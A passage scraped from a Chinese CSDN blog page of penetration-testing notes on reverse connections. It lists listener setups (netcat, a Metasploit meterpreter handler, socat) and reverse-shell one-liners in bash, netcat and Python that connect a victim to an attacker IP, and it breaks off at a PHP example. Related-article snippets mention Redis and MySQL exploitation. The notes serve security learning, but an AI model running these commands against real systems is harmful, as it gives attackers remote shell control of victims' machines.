反弹连接基础

已于 2022-03-14 17:07:58 修改
阅读量5.1k 收藏 2
点赞数
分类专栏: 渗透 文章标签: 安全
于 2022-03-11 12:57:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45455136/article/details/123416463
版权

反弹连接

反弹连接适应情况

  • 没有安装HTTP Server或找不到网站目录
  • 内网,私有IP
  • IP动态变化
  • 6379端口不允许入方向
  • 一句话木马被删除

常见端口监听方式

  • netcat:nc -lvp 7777
  • msf:
    msfconsole
    use exploit/multi/handler
    set payload php/meterpreter/reverse_tcp
    set lhost 192.168.37.130
    set lport 7777
    run
  • socat:socat TCP-LISTEN:7777 - (kali系统)

建立反弹连接方式

  • Linux bash:
    bash -i >& /dev/tcp/192.168.37.129/7777 0>&1
  • netcat:
    nc -e /bin/bash 192.168.37.129 7777
  • Python:
    python - c “import os,socket,subprocess;
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((‘192.168.37.129’,7777));os.dup2(s.fileno(),0);os.du p2(s.fileno(),1);
    os.dup2(s.fileno(),2);p=subprocess.call([’/bin/bash’,’- i’]);”
  • PHP:
    1)php -r ‘exe
最低0.47元/天 解锁文章
c1o22
关注
专栏目录
php反弹shell实现代码
10-30
这个脚本会尝试在本地打开一个监听端口,并通过Socket连接到远程服务器,从而实现反弹Shell。 整个过程涉及到了网络编程中的Socket编程,利用`socket_create`创建一个socket,然后通过`socket_connect`连接到远程...
[笔记]Windows安全之《一》反弹Shell
二次元怪兽的博客
04-01 2080
powershell反弹shell常见方式 文章目录正向连接和反向连接反弹连接)PowerShell的配置常见的反弹Shell总结 正向连接和反向连接反弹连接) PowerShell的配置 常见的反弹Shell 总结
TCP连接反弹技术
最新发布
weixin_43049833的博客
02-08 558
总的来说,反弹shell的基础操作包括在攻击者的机器上设置一个监听端口,然后在受害者机器上使用特定的命令将标准输入输出重定向到该端口,从而实现远程控制。在反弹技术中,Netcat可以用来在攻击者的机器上监听特定端口,等待从受害者机器上发出的连接请求,一旦连接建立,就可以进行命令执行和数据传输。其次,反弹技术,也被称为反向连接反弹shell,是攻击者在被害主机上执行的命令能够通过网络送回到攻击者机器上的一种技术。在TCP/IP协议中,TCP提供数据传输过程中的连接建立、数据包排序和错误恢复等机制。
反弹连接vlunhub靶机prinme1
m0_57379855的博客
09-25 485
2021-9-3 通过ip获取root权限漏洞靶机下载扫描局域网内的C段主机扫描端口获得运行的服务扫描目录获得关键信息fuzz获得正确的参数wordpress漏洞利用msfvenom生成反弹shellmsfconsole监听利用Ubuntu内核提权渗透测试的流程与技术 漏洞靶机下载 提供靶机的镜像平台链接 https://www.vulnhub.com/ 该平台有非常多的漏洞靶机镜像 今天测试的靶机链接为 https://www.vulnhub.com/entry/prime-1,358/ 点击下载,直接
PHP后门反弹连接DVWA
m0_57379855的博客
03-31 3300
PHP后门反弹连接DVWA环境准备操作系统准备DVWA靶场准备metasploit配置监控及攻击载荷配置监控配置攻击载荷生成php后门上传后门文件后渗透获取数据库信息 环境准备 操作系统准备 kali : 192.168.202.133 win10:192.168.202.139 DVWA靶场准备 DVWA下载 注意:配置DVWA环境 准备PHP7.0以上,和 Nginx环境 设置网站 配置数据库密码 与数据库设置保持一致 metasploit配置监控及攻击载荷 配置监控 使用handle
反弹shell的正向连接和反向连接
qq_44833342的博客
05-29 434
攻击者通过该连接获得对目标计算机的控制权。在正向连接中,攻击者需要知道目标计算机的IP地址和端口号,通过这些信息建立连接。而在反向连接中,目标计算机会向攻击者的计算机发起连接请求,攻击者只需要监听该请求即可建立连接。因此,反弹shell的反向连接更难被防御和检测,也更容易在网络中隐藏攻击者的身份。反弹shell是一种攻击技术,可以在未经授权的情况下远程控制目标计算机。正向连接是攻击者与目标计算机之间建立的连接,反向连接是目标计算机与攻击者之间建立的连接,攻击者通过该连接发送命令来控制目标计算机。
反弹shell1
08-03
1. **Socket通信基础** Socket是网络通信的基本组件,提供进程间通信(IPC)或网络间的通信。TCP(Transmission Control Protocol)和UDP(User Datagram Protocol)是两种主要的传输层协议,TCP提供面向连接、可靠...
cmd反弹shell提权
10-24
反弹shell**: 指的是目标主机主动连接到攻击者的机器,并建立一个命令行会话的过程。 **3. 提权**: 在获得了目标系统的较低权限访问后,通过一系列技术手段提升自己的权限至管理员级别或其他具有更高权限的账户。 ...
linux-ReverseShellasaService反弹shell即服务
08-13
1. **网络编程**:使用socket编程来创建TCP或UDP连接,这是实现反弹shell的基础。攻击者需要在受害主机上运行一段代码,监听特定端口并等待来自服务端的连接。 2. **编码与解码**:为了通过网络传输,命令和数据...
反弹连接后门反弹连接后门
06-25
反弹连接后门反弹连接后门反弹连接后门反弹连接后门
Redis未授权访问漏洞之反弹连接,SSH Key免密登陆,Webshell提权
qq_60115503的博客
05-10 859
Redis简介 REmote DIctionary Server(Redis)是一个由Salvatore Sanfilippo写的key-value存储系统,是跨平台的非关系型数据库(端口:6379) 存储缓存用的数据 需要高速读/写的场合使用它快速读/写 外网Redis配置 找到redis中的redis.cof文件并打开: 修改protectd-mode为no 将#bind 127.0.0.1修改为bind 127.0.0.1 修改daemonize属...
web安全学习笔记【05】——反弹Shell、正反向连接
weixin_42090431的博客
01-21 1207
命令生成:https://forum.ywhack.com/bountytips.php?ncat -e /bin/sh -lvp 5566(把/bin/sh绑定到本地的5566)命令生成:https://forum.ywhack.com/shell.php。windows上面//绑定CMD到本地5566端口(需要下载第三方工具nc)抓包技术:HTTP/TCP/UDP/ICMP/DNS/封包/代理等。安全产品:CDN/WAF/IDS/IPS/蜜罐/防火墙/杀毒等。
Mysql数据库反弹端口连接提权_MYSQL提权总结
weixin_39692045的博客
01-20 330
最近在测试一个项目,遇到了MYSQL数据库,想尽办法提权,最终都没有成功,很是郁闷,可能是自己很久没有研究过提权导致的吧,总结一下MYSQL提权的各种姿势吧,权当复习了。关于mysql提权的方法也就那么几种,希望也能帮到各位小伙伴们。一、利用mof提权前段时间国外Kingcope大牛发布了mysql远程提权0day(MySQL Windows Remote System Level Exploit...
nc 反弹链接
diankui6178的博客
09-06 225
nc -l -v -p 80在本机监听80端口,此时80端口是打开的,我们可以在浏览器输入127.0.0.1进行浏览,此时就会出现连接,我们再在监听窗口输入字符,就会在浏览器上显示了。知道上面的作用后,我们就可以在此的基础上,再在webshell里面执行 nc -e cmd.exe 192.168.246.1 80此条命令会把cmd反弹到192.168.246.1上,我们就可以想在本...
反弹端口原理与HTTP隧道技术
天元喜羊羊的博客
08-20 1557
http://blog.163.com/feiqiu_13/blog/static/16870088920108123110438/ 现在,很多木马都利用了“反弹端口原理”与“HTTP隧道技术”,它的服务端(被控制端)会主动连接客户端(控制 端),因此,在互联网上可以访问到局域网里通过NAT代理(透明代理)上网的电脑,可以穿过防火墙( 包括:包过滤型及代理型防火墙) ,并且支持所有的上网
VNC 反弹连接模式设置 for linux
Information Security Technology Organization
09-23 1827
文章作者: solariz7@yahoo.com版权所有,转载需注明作者,未经作者同意,不得用于任何形式的商业活动信息来源: I.S.T.O信息安全团队(http://blog.csdn.net/I_S_T_O)客户端到服务器正常连接方式请参考其它资料 服务器到客户端反弹连接为 在VNC客户端 vnc-viewer设为listerning mode ,然后netstat -an 查看确保缺省5
反弹端口 HTTP代理 HTTP隧道技术
whatday的专栏
10-17 5793
现在,很多木马都利用了“反弹端口原理”与“HTTP隧道技术”,它的服务端(被控制端)会主动连接客户端(控制 端),因此,在互联网上可以访问到局域网里通过NAT代理(透明代理)上网的电脑,可以穿过防火墙( 包括:包过滤型及代理型防火墙) ,并且支持所有的上网方式,只要能浏览网页的电脑,这种木马都可以访问到,那么我们有必要了解一下此类木马用到的相关技术。      反弹端口原理:   
linux下反弹shell的几种方法
热门推荐
Radiation's Blog
03-20 1万+
反弹的开始,我们需要使用nc在本地或者任意要反弹到的地方监听一个端口。最简单的做法是nc -l -p 8080,8080为要反弹的端口0x01—使用bashbash -i >& /dev/[tcp|udp]/10.1.1.19/8080 0>&1 注:该命令使用的是系统原生bash,[tcp|udp]是要使用的协议,一般选择tcp就行,10.1.1.19是你要反弹到的地址,如果要反弹到你的电脑上
VB教程:面向对象与事件驱动的程序设计基础
第一个实例展示了如何在窗体上移动内容以及实现超出范围时的反弹效果,这演示了VB的可视化设计和事件驱动机制。第二个实例是一个字符转换程序,强调了VB的即时响应和面向对象特性。 VB的主要功能和特点包括: 1. ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值